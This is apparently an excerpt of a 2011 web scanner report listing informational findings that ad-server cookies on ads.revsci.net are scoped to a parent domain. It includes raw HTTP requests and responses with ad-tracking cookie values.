document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-mu
...[SNIP]...

9.13. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dJdc="MLsXrqMOJjhroJB0OsFGPzgTQa5gk449UdSbypMOpdiJuQ8uZnyT6WZcebgrPoqwK7j54RnOdugyEJFu1u1/kxt/eHbh4iCmvSB8fik1JCbILFQwNyRB3XmZYv61AYwLDVmz3VsSmUe+fB+yP8yzNYmzFkyZrPC7z9K8YXjI963e66jPe6k/CoS4z8uWeuITGVaJoW3ZWbeBoDt2e9DmCkwiTsAu8BSlsvzgbzl9X0CKuQcYs+2vGi8KyNxZlNV/O3vQvk2KoKo/gmQnrkZg2FK0VOC45kZgVoz4gqDmiTyD6LoDLxOtAteOd0oEU38dx/0UsrqqyV8FwUnzTGiXEWBNzCaQoJc5yD4ZBJ2IbZ3w+GMFlCaS4bFeiqD5Uu4WrIJFgGCIP1V8l/sjUmvXF7kq6Ts+fyjsBk8zboXi5TdzKE7BIFHru2Tv6T88c6O9VWmg/5AxIK7ZKXryudYKYivLEGZ0ftIYIZG7USvwpiNwby3j026bB7RioZiokWlLyPwo5+CAeC/0sx5hYexS13hnRwPMINg/iiRl37OsbwyWSVpmLt6GJ0ueM3/lqli6ISMYnX9lmLUtaBXaM3ygtFwr7OJR6iahiQA2mImPSvkfiBKekT+Is7a1kjqDoqOb1KCZYp9TiGwkKq3V7Oo6VzUL6X5MPem9oO0siqzO7PmC3dykx69lQmZU6zoNGApOTsoKL9DwBEsoqNkIh4aXsB2Ygp6ipLHeMjuUE2wQpST5bYoHySP93cix8e8Gb5lV5F0zi2fBN33pN0Z4lGISYgAURmRYWoMLNIT6wwrGEZwT3tYqTQrQNx8wv38HHv0hwPiUL8IhJAd9OePqfNTjyQgaR2VZaa/rcO15+AuggRh/VXH0/vUEp8zDk1/b87FqYm7vacQYgw0jh70VRYurH4PuecWUEnVerH0qcfc4YqB/gbVhMFFF84FMttNg1o/KQK8Xuar8A4OQ5KildhHirlMV6qQghu5Om+C5gLROQlAjyIhuheNySsXz3FFVpZmVI0j1PyhkQwl8vDaYyqa3sE+32CR8"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeov8FSjRptD7ENTZzS+tm+o7g1+4q2ipO6FebBr4lX9JqakD06xSknvL52fJuOnqMnmUVtbZDezFLZDkQ9/DOcJVmus0zFa8R4eGBZWoP51vdnmVwXUWy2AzzrS3LC/KeUSBZa17NuW8wA7lJfNqWQdNV06Z479d+6FpyKgl1Hq2XjxlJ1jOqjAs1WA1dOdiAIQwLbq3YvJx3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL1wdlfCMgFvoSIbnMIU57JYoUftImTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nELrmFh+jD84pvE1zt38WPal3ooNbYubn6Gn6tNGszfofAmyosRDfqsN6xGEQBrpVuB7EfC1mMrWQQm07FAtrYhxV9jQPwF8aAzKS57OagwgoEgSWJac4EL43S44ef75AQMhog8R/Pbu0AqaCZyqSzfFJo37W/WnSakK60MhraaUHbB845TFfFuKnF6d1KnlacwSiwYA4zSViHcP6ulEzTa2oAJJBpaf86mV/36OOxQ0C06BBrl3U3FaMUccpgDS4Q6g85h8LjjPuJ5HD9lRQdGnciFJst2iIODuspDiNNQn53F37Ivg6K3BHkEYUvP8DjelaXuskVdPwcX2N1TfClGnCAS6cYQQECmKkEoV2Ty5ma1uCIeUwK/N0b9Nw80EpBMjmz2PF81rbW1LZR8Yrr50OIbx0E38b3QIYtaiQ2HH5TaVYZ38N5Be6eCj5Q7QpcoPj5ERI0sgXD6QKCSwduWmd0RV+fSV2TkbCTv+pnupeZ/EjnilqyR2yvHw6RMR0Bq3qEoPosr7iZUc//XDs7ZXY9WWcbNbUCrAvKfBaQrg0Vc6Qi97aI3G1N/kNvNpKTN/23K8u93rljutE4/CsbGAj8f7WMmbTOIMjkFV+rmcEcrgDHUZj8EV4wcvuoVrfNQkocxZzCkctye0KoRoJIKX5KRQqqUzeq06HfHZGcVhuvF3BKdMM/Fjmsszs9H6zArVaijt0fVauRh7dBVBdULPsaJ7riVOn6Uwy3fpnD9ux5E9H7qsEK1h7fbJO18nv26wKJ7YWZM5gXP2LEWHxvabbxbwwGJ1QlIMhDB0OoWtqmjDKiV9MuMnamXFEGet8G/CDst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP9qYhrYyEalVKutJsu2eWT6Je8BzKdDq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjXk4TjthW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZAPZFpFvij+HpKJotZx5w6ko9LWWaFIAAC2R/IHJ1W5UMBBCdaqSbYc7M/Frlfg0k+l6JH8QfxsE/FY8E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 1315

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.14. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-75921-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-596291-1044587-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzB